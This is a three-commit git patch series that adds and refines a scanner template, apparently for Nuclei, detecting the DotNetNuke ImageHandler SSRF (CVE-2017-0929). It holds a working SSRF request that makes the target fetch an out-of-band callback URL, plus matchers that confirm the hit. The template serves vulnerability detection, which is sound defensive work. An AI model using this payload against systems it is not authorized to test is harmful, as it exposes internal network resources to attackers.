From 70c90bba845ac22c433af123a103561c2f91ba2c Mon Sep 17 00:00:00 2001 From: meme-lord <17912559+meme-lord@users.noreply.github.com> Date: Wed, 27 Oct 2021 12:45:18 +0100 Subject: [PATCH 1/3] Added CVE-2017-0929 (DNN SSRF) --- cves/2017/CVE-2017-0929.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cves/2017/CVE-2017-0929.yaml diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml new file mode 100644 index 0000000000..ea6e1204e4 --- /dev/null +++ b/cves/2017/CVE-2017-0929.yaml @@ -0,0 +1,18 @@ +id: CVE-2017-0929 +info: + name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) + severity: medium + reference: + - https://hackerone.com/reports/482634 + author: CharanRayudu, meme-lord + tags: cve,cve2017,ssrf,dotnetnuke + +requests: + - method: GET + path: + - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}' + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From 46321e321c86bb36a2137b28f9c4f5d02235dae2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Oct 2021 12:05:42 +0000 Subject: [PATCH 2/3] Auto Generated CVE annotations [Wed Oct 27 12:05:42 UTC 2021] :robot: --- cves/2017/CVE-2017-0929.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml index ea6e1204e4..ebe7ad1e9c 100644 --- a/cves/2017/CVE-2017-0929.yaml +++ b/cves/2017/CVE-2017-0929.yaml @@ -1,11 +1,17 @@ id: CVE-2017-0929 info: name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) - severity: medium + severity: high reference: - https://hackerone.com/reports/482634 author: CharanRayudu, meme-lord tags: cve,cve2017,ssrf,dotnetnuke + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-0929 + cwe-id: CWE-918 + description: "DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources." requests: - method: GET From 4024822ddff966405147aeb80657b82459bc7f1c Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 29 Oct 2021 15:56:24 +0530 Subject: [PATCH 3/3] misc updates --- cves/2017/CVE-2017-0929.yaml | 20 ++++++++++++++------ 1 file changed, 14 insertions(+), 6 deletions(-) diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml index ebe7ad1e9c..bd7c9bcac5 100644 --- a/cves/2017/CVE-2017-0929.yaml +++ b/cves/2017/CVE-2017-0929.yaml @@ -1,24 +1,32 @@ id: CVE-2017-0929 + info: - name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) + name: DotNetNuke ImageHandler SSRF + author: charanrayudu,meme-lord severity: high + description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. reference: - https://hackerone.com/reports/482634 - author: CharanRayudu, meme-lord - tags: cve,cve2017,ssrf,dotnetnuke + - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2017-0929 cwe-id: CWE-918 - description: "DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources." + tags: cve,cve2017,oast,ssrf,dnn requests: - method: GET path: - - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}' + - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}' + + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "dns" + - "http" + + - type: status + status: + - 500 \ No newline at end of file